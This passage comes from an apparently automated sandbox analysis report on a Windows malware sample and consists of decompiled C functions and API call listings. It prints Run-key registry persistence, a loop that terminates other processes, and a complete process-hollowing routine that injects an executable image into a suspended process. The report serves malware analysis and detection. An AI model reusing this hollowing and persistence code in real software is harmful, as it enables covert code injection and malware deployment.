      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000), ref: 00417DCB
      • Part of subcall function 004186D0: CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00418723
      • Part of subcall function 004185E8: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
      • Part of subcall function 004185E8: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
      • Part of subcall function 004185E8: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 68%
    			E004019B0() {
    				void* _t11;
    				signed int _t13;
    				intOrPtr _t19;
    				void* _t20;
    				intOrPtr _t23;
    
    				_push(_t23);
    				_push(E00401A66);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t23;
    				_push(0x4545c4);
    				L00401304();
    				if( *0x454045 != 0) {
    					_push(0x4545c4);
    					L0040130C();
    				}
    				E00401374(0x4545e4);
    				E00401374(0x4545f4);
    				E00401374(0x454620);
    				_t11 = LocalAlloc(0, 0xff8); // executed
    				 *0x45461c = _t11;
    				if( *0x45461c != 0) {
    					_t13 = 3;
    					do {
    						_t20 =  *0x45461c; // 0x0
    						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
    						_t13 = _t13 + 1;
    					} while (_t13 != 0x401);
    					 *((intOrPtr*)(0x454608)) = 0x454604;
    					 *0x454604 = 0x454604;
    					 *0x454610 = 0x454604;
    					 *0x4545bc = 1;
    				}
    				_pop(_t19);
    				 *[fs:eax] = _t19;
    				_push(E00401A6D);
    				if( *0x454045 != 0) {
    					_push(0x4545c4);
    					L00401314();
    					return 0;
    				}
    				return 0;
    			}









    APIs
    • RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
    • RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
    • LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 85%
    			_entry_() {
    				char _v24;
    				char _v28;
    				void* _t17;
    				void* _t21;
    				void* _t32;
    				void* _t33;
    				void* _t38;
    				void* _t39;
    				intOrPtr _t41;
    				void* _t42;
    
    				_v28 = 0;
    				_v24 = 0;
    				E00405ADC(0x418be0);
    				_push(0x418d7b);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t41;
    				_push(_t40);
    				_push(0x418d4a);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t41;
    				_t42 = E00402944(_t32, _t39) - 2;
    				if(_t42 > 0) {
    					E004029A4(2,  &_v24);
    					E00404294(_v24, 0x418d94);
    					if(_t42 == 0) {
    						E004029A4(3,  &_v28);
    						DeleteFileA(E00404348(_v28)); // executed
    					}
    				}
    				E00418750(_t32, _t38, _t39); // executed
    				E00418A14(_t32, _t38, _t39);
    				E00418540(_t33);
    				E00418B90(_t33);
    				while(1) {
    					L4:
    					E004189E8();
    					Sleep(0x32);
    					_t17 = E00418570();
    					_t43 = _t17;
    					if(_t17 == 0) {
    						continue;
    					}
    					L5:
    					E00418590(_t43);
    					while(E00418570() != 0) {
    						E004189E8();
    						Sleep(0x32);
    					}
    					_t21 =  *0x454a64; // 0x0
    					ResumeThread(_t21);
    					do {
    						goto L4;
    					} while (_t17 == 0);
    					goto L5;
    					L4:
    					E004189E8();
    					Sleep(0x32);
    					_t17 = E00418570();
    					_t43 = _t17;
    				}
    			}














    APIs
      • Part of subcall function 00405ADC: GetModuleHandleA.KERNEL32(00000000,?,00418C93), ref: 00405AE8
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • DeleteFileA.KERNEL32(00000000,00000000,00418D4A,?,00000000,00418D7B), ref: 00418CEB
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
      • Part of subcall function 004189E8: PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000001), ref: 004189FA
      • Part of subcall function 004189E8: TranslateMessage.USER32 ref: 00418A04
      • Part of subcall function 004189E8: DispatchMessageA.USER32 ref: 00418A0A
    • Sleep.KERNEL32(00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D0B
      • Part of subcall function 00418590: SuspendThread.KERNEL32(00000000,00000000,004185B9,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185AA
      • Part of subcall function 00418590: OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185D8
      • Part of subcall function 00418590: TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000), ref: 004185DE
    • Sleep.KERNEL32(00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D27
    • ResumeThread.KERNEL32(00000000,00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D3B
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 68%
    			E00417974(void* __eax) {
    				void* _t3;
    
    				_push(0x454880);
    				_push(0x101); // executed
    				L0040C510(); // executed
    				if(__eax != 0) {
    					_t3 = E0040A56C("WSAStartup", 1);
    					E0040386C();
    					return _t3;
    				}
    				return __eax;
    			}





    APIs
    • WSAStartup.WSOCK32(00000101,00454880), ref: 0041797E
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00402218), ref: 004020E7
    • RtlLeaveCriticalSection.KERNEL32(004545C4,0040221F), ref: 00402212
      • Part of subcall function 004019B0: RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
      • Part of subcall function 004019B0: RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
      • Part of subcall function 004019B0: LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
      • Part of subcall function 004019B0: RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D1C() {
    				struct HINSTANCE__* _t24;
    				void* _t32;
    				intOrPtr _t35;
    				void* _t45;
    
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L3:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t32);
    						 *0x419004 = 0;
    					}
    					L5:
    					while(1) {
    						if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    							 *0x0045463C = 0;
    						}
    						E00403AB8();
    						if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    							_t14 =  *0x00454640;
    							if( *0x00454640 != 0) {
    								E0040532C(_t14);
    								_t35 =  *((intOrPtr*)(0x454640));
    								_t7 = _t35 + 0x10; // 0x400000
    								_t24 =  *_t7;
    								_t8 = _t35 + 4; // 0x400000
    								if(_t24 !=  *_t8 && _t24 != 0) {
    									FreeLibrary(_t24);
    								}
    							}
    						}
    						E00403A90();
    						if( *((char*)(0x454658)) == 1) {
    							 *0x00454654();
    						}
    						if( *((char*)(0x454658)) != 0) {
    							E00403C60();
    						}
    						if( *0x454630 == 0) {
    							if( *0x454024 != 0) {
    								 *0x454024();
    							}
    							ExitProcess( *0x419000); // executed
    						}
    						memcpy(0x454630,  *0x454630, 0xb << 2);
    						_t45 = _t45 + 0xc;
    						0x419000 = 0x419000;
    					}
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L3;
    				}
    			}








    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D14() {
    				intOrPtr* _t13;
    				struct HINSTANCE__* _t27;
    				void* _t36;
    				intOrPtr _t39;
    				void* _t52;
    
    				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L5:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t36);
    						 *0x419004 = 0;
    					}
    					L7:
    					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    						 *0x0045463C = 0;
    					}
    					E00403AB8();
    					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    						_t17 =  *0x00454640;
    						if( *0x00454640 != 0) {
    							E0040532C(_t17);
    							_t39 =  *((intOrPtr*)(0x454640));
    							_t7 = _t39 + 0x10; // 0x400000
    							_t27 =  *_t7;
    							_t8 = _t39 + 4; // 0x400000
    							if(_t27 !=  *_t8 && _t27 != 0) {
    								FreeLibrary(_t27);
    							}
    						}
    					}
    					E00403A90();
    					if( *((char*)(0x454658)) == 1) {
    						 *0x00454654();
    					}
    					if( *((char*)(0x454658)) != 0) {
    						E00403C60();
    					}
    					if( *0x454630 == 0) {
    						if( *0x454024 != 0) {
    							 *0x454024();
    						}
    						ExitProcess( *0x419000); // executed
    					}
    					memcpy(0x454630,  *0x454630, 0xb << 2);
    					_t52 = _t52 + 0xc;
    					0x419000 = 0x419000;
    					goto L7;
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L5;
    				}
    			}









    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D18() {
    				struct HINSTANCE__* _t26;
    				void* _t35;
    				intOrPtr _t38;
    				void* _t51;
    
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L4:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t35);
    						 *0x419004 = 0;
    					}
    					L6:
    					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    						 *0x0045463C = 0;
    					}
    					E00403AB8();
    					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    						_t16 =  *0x00454640;
    						if( *0x00454640 != 0) {
    							E0040532C(_t16);
    							_t38 =  *((intOrPtr*)(0x454640));
    							_t7 = _t38 + 0x10; // 0x400000
    							_t26 =  *_t7;
    							_t8 = _t38 + 4; // 0x400000
    							if(_t26 !=  *_t8 && _t26 != 0) {
    								FreeLibrary(_t26);
    							}
    						}
    					}
    					E00403A90();
    					if( *((char*)(0x454658)) == 1) {
    						 *0x00454654();
    					}
    					if( *((char*)(0x454658)) != 0) {
    						E00403C60();
    					}
    					if( *0x454630 == 0) {
    						if( *0x454024 != 0) {
    							 *0x454024();
    						}
    						ExitProcess( *0x419000); // executed
    					}
    					memcpy(0x454630,  *0x454630, 0xb << 2);
    					_t51 = _t51 + 0xc;
    					0x419000 = 0x419000;
    					goto L6;
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L4;
    				}
    			}








    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00405824(intOrPtr* __eax, void* __edx) {
    				char _v1032;
    				int _t13;
    				void* _t22;
    
    				_t21 = __edx;
    				if(__eax != 0) {
    					if( *(__eax + 4) >= 0x10000) {
    						return E00404080(__edx,  *(__eax + 4));
    					}
    					_t13 = LoadStringA(E00404DCC( *((intOrPtr*)( *__eax))),  *(__eax + 4),  &_v1032, 0x400); // executed
    					return E00403F78(_t21, _t13, _t22);
    				}
    				return __eax;
    			}







    APIs
    • LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00404D84(void* __eax) {
    				char _v272;
    				intOrPtr _t14;
    				void* _t16;
    				intOrPtr _t18;
    				intOrPtr _t19;
    
    				_t16 = __eax;
    				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
    					GetModuleFileNameA( *(__eax + 4),  &_v272, 0x105);
    					_t14 = E00404FC0(_t19); // executed
    					_t18 = _t14;
    					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
    					if(_t18 == 0) {
    						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
    					}
    				}
    				return  *((intOrPtr*)(_t16 + 0x10));
    			}









    APIs
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00404DA2
      • Part of subcall function 00404FC0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
      • Part of subcall function 00404FC0: RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
      • Part of subcall function 00404FC0: GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
      • Part of subcall function 00404FC0: GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
      • Part of subcall function 00404FC0: lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 37%
    			E00402670(void* __eax) {
    				void* _t3;
    				void* _t6;
    
    				if(__eax <= 0) {
    					_t6 = 0;
    				} else {
    					_t3 =  *0x41903c(); // executed
    					_t6 = _t3;
    					if(_t6 == 0) {
    						E00402778(1);
    					}
    				}
    				return _t6;
    			}






    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00403B78(intOrPtr __eax, intOrPtr __edx) {
    				void* _t6;
    				intOrPtr _t7;
    
    				_t7 = __edx;
    				 *0x454014 = 0x4011a8;
    				 *0x454018 = 0x4011b0;
    				 *0x454638 = __eax;
    				 *0x45463c = 0;
    				 *0x454640 = __edx;
    				_t1 = _t7 + 4; // 0x400000
    				 *0x45402c =  *_t1;
    				E00403A70();
    				 *0x454034 = 0; // executed
    				_t6 = E00403B18(); // executed
    				return _t6;
    			}






    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd

    Non-executed Functions

    C-Code - Quality: 76%
    			E00417F5C(intOrPtr __eax, void* __ebx, short* __ecx, char __edx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4) {
    				intOrPtr _v8;
    				char _v12;
    				CONTEXT* _v16;
    				void* _v20;
    				void _v24;
    				void _v28;
    				long _v32;
    				struct _PROCESS_INFORMATION _v48;
    				struct _STARTUPINFOA _v116;
    				CHAR* _t95;
    				short* _t171;
    				intOrPtr _t182;
    				intOrPtr _t189;
    				intOrPtr* _t194;
    				short* _t196;
    				void* _t197;
    				void* _t199;
    				void* _t200;
    				intOrPtr _t201;
    				void* _t215;
    
    				_t215 = __fp0;
    				_t199 = _t200;
    				_t201 = _t200 + 0xffffff90;
    				_t196 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				E00404338(_v8);
    				E00404338(_v12);
    				_push(_t199);
    				_push(0x418218);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t201;
    				if(_v12 != 0) {
    					_push(0x418230);
    					_push(_v8);
    					_push(0x41823c);
    					_push(_v12);
    					E00404208();
    				}
    				 *_a4 = 0;
    				_t171 = _t196;
    				if( *_t171 == 0x5a4d) {
    					_t194 =  *((intOrPtr*)(_t171 + 0x3c)) + _t196;
    					if( *_t194 == 0x4550) {
    						E00402B60( &_v116, 0x44);
    						E00402B60( &_v48, 0x10);
    						_v116.cb = 0x44;
    						_v116.dwFlags = 1;
    						_v116.wShowWindow = 0;
    						_t95 = E00404348(_v12);
    						if(CreateProcessA(E00404348(_v8), _t95, 0, 0, 0, 4, 0, 0,  &_v116,  &_v48) != 0) {
    							 *_a4 = _v48.dwProcessId;
    							_v16 = E00417F28( &_v20);
    							if(_v16 != 0) {
    								_v16->ContextFlags = 0x10007;
    								if(GetThreadContext(_v48.hThread, _v16) != 0) {
    									ReadProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v24, 4,  &_v32);
    									if( *(_t194 + 0x34) != _v24) {
    										_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
    									} else {
    										if(NtUnmapViewOfSection(_v48.hProcess,  *(_t194 + 0x34)) != 0) {
    											_v28 = VirtualAllocEx(_v48.hProcess, 0,  *(_t194 + 0x50), 0x3000, 0x40);
    										} else {
    											_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
    										}
    									}
    									_t210 = _v28;
    									if(_v28 != 0) {
    										_t197 = E00417EA4(_t196, _t210);
    										_t125 = _v28;
    										if( *(_t194 + 0x34) != _v28) {
    											E00417E10(_t215, _t197, _t194, _t125 -  *(_t194 + 0x34));
    											 *(_t194 + 0x34) = _v28;
    											E00405DE0( *((intOrPtr*)(_t171 + 0x3c)) + _t197, _t194);
    										}
    										WriteProcessMemory(_v48.hProcess, _v28, _t197,  *(_t194 + 0x50),  &_v32);
    										WriteProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v28, 4,  &_v32);
    										_v16->Eax =  *((intOrPtr*)(_t194 + 0x28)) + _v28;
    										SetThreadContext(_v48.hThread, _v16);
    										ResumeThread(_v48.hThread);
    										WaitForSingleObject(_v48.hThread, 0xffffffff);
    										_push(_t199);
    										_push(0x4181d0);
    										_push( *[fs:eax]);
    										 *[fs:eax] = _t201;
    										TerminateThread(_v48.hProcess, 0);
    										CloseHandle(_v48.hProcess);
    										_pop(_t189);
    										 *[fs:eax] = _t189;
    									}
    								}
    								VirtualFree(_v20, 0, 0x8000);
    							}
    							if( *_a4 == 0) {
    								TerminateProcess(_v48, 0);
    							}
    						}
    					}
    				}
    				_pop(_t182);
    				 *[fs:eax] = _t182;
    				_push(E0041821F);
    				return E00403EAC( &_v12, 2);
    			}
























    APIs
    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F28: VirtualAlloc.KERNEL32(00000000,000000D0,00001000,00000004,?,00418048,00000000,00418218), ref: 00417F39
    • GetThreadContext.KERNEL32(?,00000000), ref: 00418066
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
    • NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
    • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
    • WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
    • SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
